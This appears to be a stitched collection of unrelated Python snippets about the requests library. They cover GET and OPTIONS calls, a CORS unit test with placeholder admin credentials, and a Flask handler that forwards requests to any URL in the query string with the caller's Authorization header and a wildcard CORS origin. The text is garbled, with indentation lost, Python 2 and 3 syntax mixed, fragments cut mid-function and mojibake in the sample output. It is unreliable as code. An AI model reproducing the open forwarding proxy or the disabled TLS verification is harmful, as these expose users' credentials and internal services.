print "open db file %s for reading" % config_file
#config_db = dbm.open(config_file, 'c')
#config_db.close()
#with dbm.open(config_file, 'c') as db:
db = dbm.open(config_file, 'c')
for key in db.keys():
print "%s : %s" % (key.decode(), db[key].decode())
db.close()
import requests
# 启用get 请求
r = requests.get("https://www.baidu.com")
print(r.status_code)
print(type(r.text))
print(r.text)
print(r.cookies)
"""
输出:
200
<class 'str'>
<!DOCTYPE html>
<!--STATUS OK--><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/bdorz/baidu.min.css><title>ç¾åº¦ä¸ä¸ï¼ä½ å°±ç¥é</title></head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> </div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class="bg s_ipt_wr"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus=autofocus></span><span class="bg s_btn_wr"><input type=submit id=su value=ç¾åº¦ä¸ä¸ class="bg s_btn" autofocus></span> </form> </div> </div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>æ°é»</a> <a href=https://www.hao123.com name=tj_trhao123 class=mnav>hao123</a> <a href=http://map.baidu.com name=tj_trmap class=mnav>å°å¾</a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>è§é¢</a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>è´´å§</a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>ç»å½</a> </noscript> <script>document.write('<a href="http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === "" ? "?" : "&")+ "bdorz_come=1")+ '" name="tj_login" class="lb">ç»å½</a>');
</script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style="display: block;">æ´å¤äº§å</a> </div> </div> </div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>å
³äºç¾åº¦</a> <a href=http://ir.baidu.com>About Baidu</a> </p> <p id=cp>©2017 Baidu <a href=http://www.baidu.com/duty/>使ç¨ç¾åº¦åå¿
读</a> <a href=http://jianyi.baidu.com/ class=cp-feedback>æè§åé¦</a> 京ICPè¯030173å· <img src=//www.baidu.com/img/gs.gif> </p> </div> </div> </div> </body> </html>
<RequestsCookieJar[<Cookie BDORZ=27315 for .baidu.com/>]>
"""
# 类似其他请求
r = requests.post("http://httpbin.org/post")
r1 = requests.delete("http://httpbin.org/delete")
r2 = requests.head("http://httpbin.org/get")
r3 = requests.options("http://httpbin.org/get")
r4 = requests.put("http://httpbin.org/put")
def test_rest_endpoint_attribute_options(self):
# use basic auth for rest endpoint
f = requests.options(self.url_base() + '/rest/data/user/1/username',
auth=('admin', 'sekrit'),
headers={
'content-type': "",
'Origin': "http://localhost:9001",
})
print(f.status_code)
print(f.headers)
self.assertEqual(f.status_code, 204)
expected = {
'Access-Control-Allow-Origin': 'http://localhost:9001',
'Access-Control-Allow-Headers':
'Content-Type, Authorization, X-Requested-With, X-HTTP-Method-Override',
'Allow': 'OPTIONS, GET, PUT, DELETE, PATCH',
'Access-Control-Allow-Methods': 'OPTIONS, GET, PUT, DELETE, PATCH',
'Access-Control-Allow-Credentials': 'true',
}
# use dict comprehension to remove fields like date,
# content-length etc. from f.headers.
self.assertDictEqual(
{
key: value
for (key, value) in f.headers.items() if key in expected
}, expected)
## test a read only property.
f = requests.options(self.url_base() + '/rest/data/user/1/creator',
auth=('admin', 'sekrit'),
headers={
'content-type': "",
'Origin': "http://localhost:9001",
})
print(f.status_code)
print(f.headers)
self.assertEqual(f.status_code, 204)
expected1 = dict(expected)
expected1['Allow'] = 'OPTIONS, GET'
expected1['Access-Control-Allow-Methods'] = 'OPTIONS, GET'
# use dict comprehension to remove fields like date,
# content-length etc. from f.headers.
self.assertDictEqual(
{
key: value
for (key, value) in f.headers.items() if key in expected
}, expected1)
## test a property that doesn't exist
f = requests.options(self.url_base() + '/rest/data/user/1/zot',
auth=('admin', 'sekrit'),
headers={'content-type': ""})
print(f.status_code)
print(f.headers)
self.assertEqual(f.status_code, 404)
def do_options(self, url):
r = requests.options(url=url)
r.raise_for_status()
def options(res):
req_o = requests.options(res,
verify=False,
allow_redirects=False,
timeout=10)
return req_o.status_code, "OPTIONS", len(req_o.content)
def index():
qs = request.query_string
if qs:
try:
qs = qs.decode('utf8')
agent = request.headers.get('User-Agent')
oauth = request.headers.get('Authorization')
ctype = request.headers.get('Content-Type')
headers = {}
if agent is not None:
headers['User-Agent'] = agent
if oauth is not None:
headers['Authorization'] = oauth
if request.method == "POST":
user_data = {}
if 'application/json' in ctype:
user_data = request.data
else:
user_data = request.form.to_dict()
if 'multipart/form-data' in ctype:
user_files = request.files.to_dict()
r = requests.post(qs,
headers=headers,
data=user_data,
files=user_files)
else:
r = requests.post(qs, headers=headers, data=user_data)
elif request.method == "GET":
r = requests.get(qs, headers=headers)
elif request.method == "OPTIONS":
'''
OPTIONS has recently been used before POST in some libraries
but not all websites have an OPTIONS http method; therefore,
we provide a request to ourself in order to return
the correct headers with correct response code and data
'''
r = requests.options(request.base_url, headers=headers)
rt = r.text
except:
return "nope"
response = flask.Response(rt)
status_code = r.status_code
'''
we don't really care if the requests.options above
returns an OK request or not, we just care about
passing a new response with new headers, and a valid status code
'''
if request.method == "OPTIONS":
status_code = 200
response.headers['Access-Control-Allow-Origin'] = '*'
'''
preflight CORS policy response headers
- Returns Allowed Methods:
In our case, GET and POST are the only ones allowed
- Returns Allowed Headers:
In our case, it is the headers that the user requested to use
so, the ones in Access-Control-Request-Headers
'''
response.headers['Access-Control-Allow-Methods'] = 'GET, POST, OPTIONS'
response.headers['Access-Control-Allow-Headers'] = request.headers.get(
'Access-Control-Request-Headers')
return response, status_code
else:
print("nope")
return render_template('index.html')
def optionrequest(self, url, payload):
return requests.options(url,
headers=self.headers,
data=json.dumps(payload))
